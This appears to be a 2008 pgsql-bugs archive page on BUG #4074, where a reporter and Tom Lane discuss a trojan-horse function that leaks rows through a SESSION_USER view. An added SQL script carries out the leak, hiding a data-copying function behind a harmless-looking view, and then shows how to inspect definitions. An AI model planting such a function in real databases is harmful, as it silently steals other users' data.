I didn't realize this was a public mailing list; I posted this report at
http://www.postgresql.org/support/submitbug and thought that it would
only be reported internally.
I agree with your analysis, although Carol may or may not be aware that
she is executing any functions at all. But in any case, Heikki
Linnakangas' observation that you shouldn't even access untrusted views
clearly applies here. Thank you both for your prompt replies.
Tom Lane wrote:
> "Lars Olson" <leolson1(at)uiuc(dot)edu> writes:
>> Creating a view that depends on the value of SESSION_USER enables a
>> minimally-privileged user to write a user-defined function that contains a
>> trojan-horse to get arbitrary data from the base table.
> This example proves nothing except that you shouldn't execute untrusted
> code --- Carol gave up her data by willingly executing Bob's function.
> I don't think that the use of SESSION_USER is particularly to blame.
> There are certainly any number of other ways Bob could have abused
> her trust here.
>> This is highly related to a paper I am preparing for a security conference
>> that I am submitting in two weeks. Sorry about the short notice, I only
>> just thought of this problem yesterday. I would like to use this as an
>> example in my paper, but I will not do so without PostgreSQL's permission.
>> Please advise.
> If this were a security issue, you already spilled the beans by
> reporting it to a public mailing list; so I'm unsure what you are
> concerned about.
> regards, tom lane
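The scenario the report describes, played out as an added PostgreSQL example (this is not code from the bug report or from the PostgreSQL project): Alice exposes a per-user slice of a private table through a view whose WHERE clause depends on SESSION_USER; Bob, who can only read his own rows, wraps a SELECT from that view in a function and hides the function behind an innocuous view; Carol queries Bob's view and, because the function runs with her identity, her rows are copied into a table Bob owns. The role names (alice, bob, carol), table, view and function names are assumptions. The script expects to be run by a superuser in one psql session, uses SET SESSION AUTHORIZATION (which, unlike SET ROLE, changes SESSION_USER) to switch identities, and assumes the three roles may create objects in the public schema, which needs an explicit GRANT on PostgreSQL 15 and later.

```sql
-- Added example (not from the original report or the PostgreSQL project).
-- Roles, table, view and function names are assumptions.
CREATE ROLE alice LOGIN;
CREATE ROLE bob   LOGIN;
CREATE ROLE carol LOGIN;
GRANT CREATE ON SCHEMA public TO alice, bob, carol;  -- required on PG 15+

-- Alice owns the base table and exposes only the caller's own rows.
SET SESSION AUTHORIZATION alice;
CREATE TABLE secrets (owner text NOT NULL, payload text NOT NULL);
INSERT INTO secrets VALUES ('bob', 'bob-secret'), ('carol', 'carol-secret');
CREATE VIEW my_secrets AS
    SELECT owner, payload FROM secrets WHERE owner = SESSION_USER;
GRANT SELECT ON my_secrets TO bob, carol;   -- the base table itself stays private
RESET SESSION AUTHORIZATION;

-- Bob, a minimally privileged user, builds the trojan horse.  The function is
-- SECURITY INVOKER (the default), so it runs as whoever calls it, and the
-- SESSION_USER test inside my_secrets resolves to the caller, not to Bob.
SET SESSION AUTHORIZATION bob;
CREATE TABLE stash (owner text, payload text);
GRANT INSERT ON stash TO PUBLIC;            -- the victim must be able to write here
CREATE FUNCTION helpful(n int) RETURNS int LANGUAGE sql AS $$
    INSERT INTO stash SELECT owner, payload FROM my_secrets;  -- copies the caller's rows
    SELECT n * 2;                                             -- the advertised behaviour
$$;
-- Carol never has to call helpful() by name: a view that wraps it is enough.
CREATE VIEW doubled AS SELECT helpful(21) AS answer;
GRANT SELECT ON doubled TO PUBLIC;
RESET SESSION AUTHORIZATION;

-- Carol reads Bob's view.  helpful() executes as carol, SESSION_USER is carol,
-- so my_secrets yields her row and the INSERT lands in Bob's table.
SET SESSION AUTHORIZATION carol;
SELECT * FROM doubled;          -- answer = 42; nothing looks wrong to Carol
RESET SESSION AUTHORIZATION;

SET SESSION AUTHORIZATION bob;
SELECT * FROM stash;            -- owner = carol, payload = carol-secret
RESET SESSION AUTHORIZATION;

-- What Carol could have checked before touching anything Bob owns: the
-- definition of his views and functions, and whether they run as her.
SELECT pg_get_viewdef('doubled'::regclass, true);
SELECT p.proname, p.prosecdef AS security_definer, p.prosrc
FROM pg_proc p
JOIN pg_roles r ON r.oid = p.proowner
WHERE r.rolname = 'bob';
```

The check at the end is the practical form of Heikki Linnakangas' advice in the thread: anything Bob owns that Carol selects from or calls runs arbitrary SQL under her identity, so she has to read its definition (or refuse to use it) before relying on it. As Tom Lane notes, SESSION_USER is not essential to the leak; the same function could read any view or table Carol can see and Bob cannot, which is why the fix is not to avoid SESSION_USER in view definitions but to avoid executing untrusted code.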
pgsql-bugs by date

Next: From: Dave Page, Date: 2008-03-31 22:04:25, Subject: Re: BUG #4074: Using SESSION_USER or CURRENT_USER in a view definition is unsafe
Previous: From: Tom Lane, Date: 2008-03-31 21:46:48, Subject: Re: BUG #4074: Using SESSION_USER or CURRENT_USER in a view definition is unsafe